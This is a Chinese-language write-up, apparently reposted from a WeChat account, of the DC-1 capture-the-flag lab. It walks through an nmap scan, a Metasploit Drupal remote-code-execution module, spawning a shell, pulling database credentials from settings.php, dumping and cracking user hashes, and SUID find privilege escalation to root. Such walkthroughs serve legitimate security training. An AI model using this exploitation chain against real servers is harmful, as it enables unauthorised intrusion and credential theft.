DC-1实战演练

首先进行准备工作：

装好DC-1（网络适配器设置为nat） IP:192.168.2.133

打开kali机  IP:192.168.2.132

利用nmap进行扫描IP段存活主机 命令为：

nmap -sS 192.168.2.132/24

扫描结果如下：

可以看到存活一台主机,且开启了ssh,http,rpcbind服务

首先判断，ssh服务是否可爆破，http则直接访问web页面

访问web页面：

收集信息：

  1.登录框是否为弱口令，sql注入，没有验证码爆破

  2.Drupal 很明显是cms，收集该cms版本查看已经存在的漏洞

  3.寻找该web站所使用语言，中间件，操作系统等

  4.敏感目录，比如robots，git，syn这类

分析后开始实践

通过wappalyzer

再万能百度

发现9.x版本以下存在远程代码执行的漏洞

打开msf搜索drupal模块

msfconsoleuse drupaluse 1show optionsset rhosts 192.168.2.133run

此时已经拿到权限，进入shell模式查看当前权限

首先查看目录文件

这里可以看到flag1.txt在文件中，打开提示

Every good CMS needs a config file - and so do you.br

大概意思就是需要配置文件

继续百度

利用find搜索配置文件

find / -name setting.php

打开该配置文件

flag2得出，

暴力和字典攻击不是获得访问权限的唯一方法（您将需要访问权限）你能用这些凭据做什么？

这里提示大概是不用爆破，有了数据库账号密码直接连接即可

这里提前需要一条命令

python -c 'import pty; pty.spawn("/bin/bash")' 

转为交互式shell

mysql -u dbuser -pR0ck3tshow databases;use drupaldbshow tables;select * from users;

放入cmd5解密

admin  53cr3t

Fred    MyPassword

得出flag3.txt:

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

特殊的PERMS将帮助查找密码，但您需要执行该命令才能找到阴影中的内容。

密码，阴影，执行=/etc/passwd

cat /etc/passwd

果然flag4在，根据这个可以知道flag4在home目录下

cd /home/flag4lscat flag4.txt

你能用同样的方法在根目录中查找或访问标志吗？可能但也许这并没有那么容易。或者可能是这样？

很明显这里需要提取权限，在root情况下相同的方法得到flag，先确认下权限

思考前面拿取第二个flag的时候是用find，则可以尝试利用find提权

find / -name flag4.txt -exec "whoami" ;find / -name flag4.txt -exec  "/bin/sh" ;cd /rootls

注意 /bin/sh来源于

这里尝试cd root目录失败 ，是由/bin/sh这个脚本文件控制，所以给/bin/sh提权然后切换root

到此靶场就通关啦！！

原文始发于微信公众号（shadowsec）：DC-1实战演练